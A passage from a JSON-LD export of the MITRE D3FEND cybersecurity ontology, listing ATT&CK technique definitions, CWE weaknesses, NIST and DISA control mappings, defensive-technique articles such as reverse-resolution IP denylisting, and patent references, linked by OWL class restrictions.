    },
    {
      "@id": "d3f:T0826",
      "@type": "owl:Class",
      "d3f:attack-id": "T0826",
      "d3f:definition": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Loss of Availability - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Availability"
    },
    {
      "@id": "d3f:CWE-1078",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1078",
      "d3f:definition": "The source code does not follow desired style or formatting for indentation, white space, comments, etc.",
      "rdfs:label": "Inappropriate Source Code Style or Formatting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Event Logging | Compilation of Audit Records from Multiple Sources",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-2(1)"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Security and Privacy Policy Filters",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(8)"
    },
    {
      "@id": "d3f:CWE-1056",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1056",
      "d3f:definition": "A named-callable or method control element has a signature that supports a variable (variadic) number of parameters or arguments.",
      "rdfs:label": "Invokable Control Element with Variadic Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:CCI-000187_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, maps the authenticated identity to the account of the individual or group.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000187"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-23",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Data Mining Protection",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:JobFunctionAccessPatternAnalysis"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        }
      ],
      "rdfs:label": "AC-23"
    },
    {
      "@id": "d3f:SystemDependencyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemDependencyMapping"
      ],
      "d3f:d3fend-id": "D3-SYSDM",
      "d3f:definition": "System dependency mapping identifies and models the dependencies of system components on each other to carry out their function.",
      "d3f:kb-article": "## How it works\nThe organization collects and models architectural information about the software, hardware, and products and maps the dependencies between systems, including each system's internal components and dependencies.\n\n## Considerations\n* Data exchanges identified in the network mapping efforts usually indicate such dependencies, but may not be part of the intended design.\n* Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.\n* System depedency mapping can identify internal dependencies of standard and pre-built systems that should be incorporated into a complete system dependency model.\n* System dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.\n* System dependencies should identify the integral components of a given named system and their structure to form a system.\n* System dependencies with a given system may be fixed by a particular product's configuration, and leveraging external knowledge bases about dependencies available (e.g., from package managers) is essential.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-SoftwareVulnerabilityGraphDatabase"
        },
        {
          "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": {
        "@id": "d3f:SystemDependency"
      },
      "rdfs:label": "System Dependency Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:Na3fcd2eb076b48a380873d5e8475d8b0"
        }
      ]
    },
    {
      "@id": "_:Na3fcd2eb076b48a380873d5e8475d8b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemDependency"
      }
    },
    {
      "@id": "d3f:T1681",
      "@type": "owl:Class",
      "d3f:attack-id": "T1681",
      "d3f:definition": "Threat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. These reports may include descriptions of behavior, detailed breakdowns of attacks, atomic indicators such as malware hashes or IP addresses, timelines of a group’s activity, and more. Adversaries may change their behavior when planning their future operations.",
      "rdfs:label": "Search Threat Vendor Data",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:PrincipalComponentsAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PCA",
      "d3f:definition": "Principal Component Analysis (PCA) is a statistic-based method of identifying patterns in a large dataset while increasing interpretability and preserving information.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Principal component analysis. [Link](https://en.wikipedia.org/wiki/Principal_component_analysis)",
      "rdfs:label": "Principal Components Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:DimensionReduction"
      }
    },
    {
      "@id": "d3f:Reference-DataProcessingAndScanningSystemsForGeneratingAndPopulatingADataInventory",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US11240273B2/"
      },
      "d3f:kb-abstract": "In particular embodiments, a data processing data inventory generation system is configured to: (1) generate a data model (e.g., a data inventory) for one or more data assets utilized by a particular organization; (2) generate a respective data inventory for each of the one or more data assets; and (3) map one or more relationships between one or more aspects of the data inventory, the one or more data assets, etc. within the data model. In particular embodiments, a data asset (e.g., data system, software application, etc.) may include, for example, any entity that collects, processes, contains, and/or transfers personal data (e.g., such as a software application, “internet of things” computerized device, database, website, data-center, server, etc.). The system may be configured to identify particular data assets and/or personal data in data repositories using any suitable intelligent identity scanning technique.",
      "d3f:kb-author": "Kabir A. Barday, Mihir S. Karanjkar, Steven W. Finch, Ken A. Browne, Nathan W. Heard, Aakash H. Patel, Jason L. Sabourin, Richard L. Daniel, Dylan D. Patton-Kuhl, Jonathan Blake Brannon",
      "d3f:kb-organization": "OneTrust LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:DataInventory"
      },
      "d3f:kb-reference-title": "Data processing and scanning systems for generating and populating a data inventory",
      "rdfs:label": "Reference - Data processing and scanning systems for generating and populating a data inventory"
    },
    {
      "@id": "d3f:BootRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A d3f:Record which is an essential component of the early boot (system initialization) process.",
      "rdfs:label": "Boot Record",
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:CWE-1188",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1188",
      "d3f:definition": "The product initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure.",
      "rdfs:label": [
        "Initialization of a Resource with an Insecure Default",
        "Insecure Default Initialization of Resource"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1391",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1391",
      "d3f:definition": "The product uses weak credentials (such as a default key or hard-coded password) that can be calculated, derived, reused, or guessed by an attacker.",
      "rdfs:label": "Use of Weak Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:AML.T0008.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.004",
      "d3f:definition": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers. This can be used to bypass a Content Security Policy which prevent retrieving content from arbitrary locations.",
      "rdfs:label": "Serverless - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Serverless"
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForDetectingMaliciousWebsites_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20140331319A1"
      },
      "d3f:kb-abstract": "A method and apparatus for detecting malicious websites is disclosed.",
      "d3f:kb-author": "John Burnet MUNRO, IV; Jason Aaron Trost; Zachary Daniel HANIF",
      "d3f:kb-mitre-analysis": "This patent describes a domain classification engine on the host computer that analyzes URLs clicked by a user or entered into a web browser to visit a website. URL analysis is done by using a combination of techniques:\n\n* Feature extraction: A URL is analyzed against features associated with suspicious URLs such as % of longest consecutive digits in a subdomain, % of longest repeated characters in a subdomain, % of vowels in a high level domain.\n\n* Markov analysis: The probability of a digit occurring in normal language given the preceding two digits is determined. For example, if the received URL is google.com, the probability of a 'g' occurring at the beginning of a word, the probability of an 'o' occurring after a \"g, the probability of an \"o' occurring after a 'g' and \"o, and so forth will be determined. The probability of each digit is then multiplied to get a probability for the whole domain name. Probabilities are determined based on a database of existing usage, such as a dictionary, or a list of known good domain names\n\n* Domain names are compared against an existing dataset of known unauthorized domain names.\n\nA rating is developed based on the results of these techniques, and if the rating is over a set threshold, an action is taken such as blocking access or generating an alert.",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:URLAnalysis"
      },
      "d3f:kb-reference-title": "Method and Apparatus for Detecting Malicious Websites",
      "rdfs:label": "Reference - Method and Apparatus for Detecting Malicious Websites - Endgame Inc"
    },
    {
      "@id": "d3f:OTTransportConfigurationCommand",
      "@type": "owl:Class",
      "d3f:definition": "Configure transport settings for a communication channel.",
      "rdfs:comment": "Modbus: Encapsulated Interface Transport",
      "rdfs:label": "OT Transport Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:CWE-314",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-314",
      "d3f:definition": "The product stores sensitive information in cleartext in the registry.",
      "rdfs:label": "Cleartext Storage in the Registry",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:NetworkVideoStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital video media content to users.",
      "rdfs:label": "Network Video Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMediaStreamingResource"
      }
    },
    {
      "@id": "d3f:CCI-002165_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined discretionary access control policies over defined subjects and objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002165"
    },
    {
      "@id": "d3f:ReverseResolutionIPDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ReverseResolutionIPDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-RRID",
      "d3f:definition": "Blocking a reverse lookup based on the query's IP address value.",
      "d3f:kb-article": "## How it works\nThis technique prevents a client from learning domains deemed to be potentially malicious, which would have been delivered via reverse resolution responses over the DNS protocol.\n\nQueries for reverse resolution requests (that is, requests where IP(s) are sent and a domain is returned) are collected, and the IP address(es) included in the query are examined. If the IP address(es) are in a range included in the blacklist, then the query is dropped.\n\n## Considerations\n- The blacklist will have to be maintained and will need to be kept up to date with identified maintenance cycles to ensure lists are not stale.\n- DNS query traffic can be transmitted over many different protocols, which presents a challenge to implementing methods to extract all DNS query IP address value(s).\n  - DNS has historically used UDP port 53, with TCP port 53 instead used for responses over 512 bytes or after a lack of response over UDP.\n  - Usage of new protocols to provide confidentiality for DNS traffic, such as DoH (DNS over HTTPS) and DoT (DNS over TLS), complicates collection of the IP address(es) in DNS queries. These protocols have often been enabled in browser settings transparently after a browser update, with DNS queries proxied over one of these cryptographic protocols through a specified host.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Reverse Resolution IP Blacklisting",
      "rdfs:label": "Reverse Resolution IP Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "_:N2619759435504e22a6fcf2488232fe3f"
        }
      ]
    },
    {
      "@id": "_:N2619759435504e22a6fcf2488232fe3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:OSAPIExec",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that replaces the current process image with a new processs image, executing a specified program.",
      "d3f:invokes": {
        "@id": "d3f:Exec"
      },
      "rdfs:label": "OS API Exec",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nc1c8b28ac551434fa4cda5cd3183ba3f"
        }
      ]
    },
    {
      "@id": "_:Nc1c8b28ac551434fa4cda5cd3183ba3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Exec"
      }
    },
    {
      "@id": "_:Nfadb52edfdfb4c5891f28e14571f557a",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Kurtosis"
          },
          {
            "@id": "d3f:Moments"
          },
          {
            "@id": "d3f:Skewness"
          }
        ]
      }
    },
    {
      "@id": "d3f:T1629.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1629.003",
      "d3f:definition": "Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.",
      "rdfs:label": "Disable or Modify Tools - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1629"
      },
      "skos:prefLabel": "Disable or Modify Tools"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:control-name": "Separation of System and User Functionality",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SC-2"
    },
    {
      "@id": "d3f:StackComponent",
      "@type": "owl:Class",
      "d3f:definition": "A stack component is any component of a call stack used for stack-based memory allocation in a running process.  Examples include saved instruction pointers, stack frames, and stack frame canaries.",
      "rdfs:label": "Stack Component",
      "rdfs:seeAlso": {
        "@id": "dbr:Call_stack"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CWE-1236",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1236",
      "d3f:definition": "The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.",
      "d3f:synonym": [
        "CSV Injection",
        "Excel Macro Injection",
        "Formula Injection"
      ],
      "rdfs:label": "Improper Neutralization of Formula Elements in a CSV File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:T1436",
      "@type": "owl:Class",
      "d3f:attack-id": "T1436",
      "d3f:definition": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Commonly Used Port - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileExfiltrationTechnique"
        }
      ],
      "skos:prefLabel": "Commonly Used Port"
    },
    {
      "@id": "d3f:Step",
      "@type": "owl:Class",
      "rdfs:label": "Step",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Plan"
        },
        {
          "@id": "_:N049e59d1d130483999be6ab2c755065c"
        },
        {
          "@id": "_:Nb62a22b6153f41108743d0e8377b27f3"
        },
        {
          "@id": "_:N6f17252821f4468dbc3f523da93ce6c8"
        },
        {
          "@id": "_:Ne1ef39d216254b8cacaeb8111f9d528f"
        }
      ]
    },
    {
      "@id": "_:N049e59d1d130483999be6ab2c755065c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:end"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "_:Nb62a22b6153f41108743d0e8377b27f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:fork"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "_:N6f17252821f4468dbc3f523da93ce6c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-associated-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "_:Ne1ef39d216254b8cacaeb8111f9d528f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:next"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "d3f:T1003.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:OperatingSystemFile"
        },
        {
          "@id": "d3f:ProcessImage"
        }
      ],
      "d3f:attack-id": "T1003.007",
      "d3f:definition": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)",
      "rdfs:label": "Proc Filesystem",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Na30c17ff3f154be08d15089c193f9c46"
        },
        {
          "@id": "_:N590d382198da47048db401518b5baa7d"
        }
      ]
    },
    {
      "@id": "_:Na30c17ff3f154be08d15089c193f9c46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "_:N590d382198da47048db401518b5baa7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessImage"
      }
    },
    {
      "@id": "d3f:CWE-806",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-806",
      "d3f:definition": "The product uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer.",
      "rdfs:label": "Buffer Access Using Size of Source Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-805"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-7_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:control-name": "Unsuccessful Logon Attempts | Use of Alternate Authentication Factor",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-7(4)"
    },
    {
      "@id": "d3f:T1498",
      "@type": "owl:Class",
      "d3f:attack-id": "T1498",
      "d3f:definition": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)",
      "rdfs:label": "Network Denial of Service",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:OTEngineeringWorkstation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:communicates-with": {
        "@id": "d3f:OTController"
      },
      "d3f:definition": "An Engineering Workstation (EWS) is used to perform various maintenance, configuration, or diagnostics functions for a control system. The EWS will likely require dedicated application software to interface with various devices (e.g., RTUs, PLCs), and may be used to transfer data or files between the control system devices and other networks.",
      "d3f:runs": {
        "@id": "d3f:OTEngineeringSoftware"
      },
      "d3f:synonym": "EWS",
      "rdfs:isDefinedBy": {
        "@id": "https://attack.mitre.org/assets/A0001"
      },
      "rdfs:label": "OT Engineering Workstation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ClientComputer"
        },
        {
          "@id": "_:N0c6160daf8b74adfb6e3a15b62099be1"
        },
        {
          "@id": "_:N6a6a6dcbf7b745ae84703a8711db4690"
        }
      ]
    },
    {
      "@id": "_:N0c6160daf8b74adfb6e3a15b62099be1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTController"
      }
    },
    {
      "@id": "_:N6a6a6dcbf7b745ae84703a8711db4690",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEngineeringSoftware"
      }
    },
    {
      "@id": "d3f:Mean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MEA",
      "d3f:definition": "The sum of all measurements divided by the number of observations in the data set.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:queries",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x queries y: The entity x requests information or data from entity y.",
      "rdfs:label": "queries",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-query"
        }
      ]
    },
    {
      "@id": "d3f:CWE-161",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-161",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Multiple Leading Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-160"
      }
    },
    {
      "@id": "d3f:StorageDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing the activity, configuration, or errors of storage devices, including physical disks, SSDs, or logical partitions. These events often pertain to data availability, integrity, and storage health.",
      "rdfs:label": "Storage Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N28104029cd7b4f4bb93b4718aed8f023"
        }
      ]
    },
    {
      "@id": "_:N28104029cd7b4f4bb93b4718aed8f023",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:CWE-129",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-129",
      "d3f:definition": "The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array.",
      "d3f:synonym": [
        "array index underflow",
        "index-out-of-range",
        "out-of-bounds array index"
      ],
      "rdfs:label": "Improper Validation of Array Index",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1285"
      }
    },
    {
      "@id": "d3f:BootROM",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:First-stageBootLoader"
      },
      "d3f:definition": "Boot ROM is a piece of read-only memory (ROM) that is used for booting a computer system. It contains instructions that are run after the CPU is reset to the reset vector, and it typically loads a bootloader.",
      "d3f:synonym": "Boot Read-only Memory",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Boot_ROM"
      },
      "rdfs:label": "Boot ROM",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ROM"
        },
        {
          "@id": "_:Nbc4d91f34899437ca65ac974bc835fc1"
        }
      ]
    },
    {
      "@id": "_:Nbc4d91f34899437ca65ac974bc835fc1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:First-stageBootLoader"
      }
    },
    {
      "@id": "d3f:T1087",
      "@type": "owl:Class",
      "d3f:attack-id": "T1087",
      "d3f:definition": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
      "rdfs:label": "Account Discovery",
      "rdfs:seeAlso": {
        "@id": "d3f:T1136"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001744_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined security responses automatically if baseline configurations are changed in an unauthorized manner.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001744"
    },
    {
      "@id": "d3f:OTDeviceManagementMessage",
      "@type": "owl:Class",
      "d3f:definition": "Manage devices and their configurations.",
      "rdfs:label": "OT Device Management Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:InboundInternetDNSResponseTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound internet DNS response traffic is DNS response traffic from a host outside a given network initiated on an incoming connection to a host inside that network.",
      "rdfs:label": "Inbound Internet DNS Response Traffic",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/dns_answer"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:PublicKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A public key can be disseminated widely as part of an asymmetric cryptography framework and be used to encrypt messages to send to the public key's owner or to authenticate signed messages from that sender.",
      "d3f:depends-on": {
        "@id": "d3f:PrivateKey"
      },
      "rdfs:label": "Public Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:subClassOf": [
        {
